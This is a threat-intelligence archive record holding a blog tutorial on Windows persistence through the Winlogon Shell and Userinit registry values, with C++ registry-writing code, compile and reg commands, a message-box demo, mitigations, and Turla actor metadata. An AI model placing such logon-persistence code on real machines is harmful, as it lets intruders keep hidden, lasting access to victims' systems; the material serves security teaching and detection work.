{
	"id": "9a00da3e-db85-4bfa-8b52-64426c0ac6d9",
	"created_at": "2026-04-06T01:30:51.632098Z",
	"updated_at": "2026-04-10T13:12:17.049293Z",
	"deleted_at": null,
	"sha1_hash": "d108b16da45c62878d635efbf096587fe7b63b72",
	"title": "Malware development: persistence - part 7. Winlogon. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3160050,
	"plain_text": "Malware development: persistence - part 7. Winlogon. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-06-12 · Archived: 2026-04-06 00:08:32 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nToday I’ll write about the result of my own research into another persistence trick: Winlogon registry keys.\r\nwinlogon\r\nThe Winlogon process is responsible for user logon and logoff, startup and shutdown, and locking the screen.\r\nAuthors of malware could alter the registry entries that the Winlogon process uses to achieve persistence.\r\nThe following registry keys must be modified in order to implement this persistence technique:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 1 of 20\n\nHowever, local administrator privileges are required to implement this technique.\r\npractical example\r\nFirst of all, create our malicious application ( hack.cpp ):\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBoxA(NULL, \"Meow-meow!\",\"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs you can see, it’s just a pop-up “meow” message, as usual.\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThe generated hack.exe needs to be dropped onto the victim’s machine.\r\nChanges to the Shell registry key that include a malicious app will result in the execution of both\r\nexplorer.exe and hack.exe during Windows logon.\r\nThis can be done immediately using the script below:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // shell\r\n // const char* sh = \"explorer.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\n const char* sh = \"explorer.exe,hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Shell\", 0, REG_SZ, (unsigned char*)sh, strlen(sh));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nThe same applies to Userinit . If this registry key includes a malicious app, both userinit.exe and hack.exe\r\nwill be executed during Windows logon:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // userinit\r\n const char* ui = \"C:\\\\Windows\\\\System32\\\\userinit.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Userinit\", 0, REG_SZ, (unsigned char*)ui, strlen(ui));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nSo, compile the program responsible for persistence:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\ndemo\r\nAnd see everything in action. First of all, check the registry keys:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /s\r\nCopy the malicious app to C:\\Windows\\System32\\ . And run:\r\n.\\pers.exe\r\nThen, logout and login:\r\nAccording to the logic of our malicious program, “meow-meow” popped up:\r\nLet’s check the process properties via Process Hacker 2:\r\nThen, cleanup:\r\nreg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /d \"exp\r\nWhat about the other key, Userinit ? Let’s check. Run:\r\n.\\pers.exe\r\nLogout and login:\r\nThen, for the purity of the experiment, check the properties of hack.exe in Process Hacker 2:\r\nAs you can see, the parent process is winlogon.exe .\r\nCleanup:\r\nreg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Userinit\" /t REG_SZ /d \"\r\nAs you can see, in both cases the malware will be executed during Windows authentication.\r\nBut there is an interesting caveat. For example, if we update the registry key with the following logic:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // shell\r\n const char* sh = \"explorer.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Shell\", 0, REG_SZ, (unsigned char*)sh, strlen(sh));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nThat is, our malware is located along the path Z:\\...\\hack.exe instead of C:\\Windows\\System32\\hack.exe .\r\nRun:\r\n.\\pers.exe\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /s\r\nAnd relogin:\r\nChecking the properties of hack.exe :\r\nAs you can see, the parent process is Non-existent process . The parent will show as Non-existent process since\r\nuserinit.exe terminates itself.\r\nThere is one more note. The Notify registry key is commonly present in older operating systems (prior to\r\nWindows 7 ) and it points to a notification package DLL file that manages Winlogon events. If you replace the\r\nDLL entries under this registry key with any other DLL, Windows will execute it during logon.\r\nWhat about mitigations? Limit user account privileges so that only authorized administrators can modify the\r\nWinlogon helper. Tools such as Sysinternals Autoruns may also be used to detect system modifications that may\r\nbe attempts at persistence, such as the listing of current Winlogon helper values.\r\nThis persistence trick is used by the Turla group and by malware such as Gazer and Bazaar in the wild.\r\nMITRE ATT\u0026CK - Boot or Logon Autostart Execution: Winlogon Helper DLL\r\nTurla\r\nGazer backdoor\r\nBazaar\r\nsource code on Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html"
	],
	"report_names": [
		"malware-pers-7.html"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439051,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.pdf",
		"text": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.txt",
		"img": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.jpg"
	}
}